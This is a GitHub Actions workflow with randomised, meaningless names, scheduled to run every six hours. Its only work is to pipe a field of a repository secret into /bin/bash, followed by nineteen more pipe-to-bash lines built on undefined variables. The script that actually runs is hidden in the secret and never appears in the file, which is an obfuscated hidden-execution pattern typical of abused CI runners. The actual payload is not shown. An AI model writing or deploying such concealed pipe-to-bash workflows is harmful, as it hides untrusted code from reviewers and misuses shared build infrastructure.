name: zhemedadcak
on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhemedadcak
        env:
          kr75090: ${{ secrets.kr75090 }}
        run: |
          echo $kr75090 | jq -r .pcyh3604 | /bin/bash
          echo $ob11429 | jq -r .r325 | /bin/bash
          echo $vbi8 | jq -r .j92 | /bin/bash
          echo $naqg05682 | jq -r .f0 | /bin/bash
          echo $edfo2 | jq -r .yk68623 | /bin/bash
          echo $t5174 | jq -r .a3085 | /bin/bash
          echo $o637 | jq -r .d8 | /bin/bash
          echo $b94 | jq -r .ca7143 | /bin/bash
          echo $g48 | jq -r .jg2248 | /bin/bash
          echo $mbs654 | jq -r .z5381 | /bin/bash
          echo $f3741 | jq -r .yzkl9321 | /bin/bash
          echo $a48672 | jq -r .o461 | /bin/bash
          echo $orp61345 | jq -r .fxqic60554 | /bin/bash
          echo $ntql884 | jq -r .mfeyo13150 | /bin/bash
          echo $safn7520 | jq -r .vk8772 | /bin/bash
          echo $fz02 | jq -r .r4 | /bin/bash
          echo $j81854 | jq -r .muhc0 | /bin/bash
          echo $gy09309 | jq -r .ezhq21 | /bin/bash
          echo $rgfge67 | jq -r .fmj14 | /bin/bash
          echo $uahpo7 | jq -r .mid73717 | /bin/bash

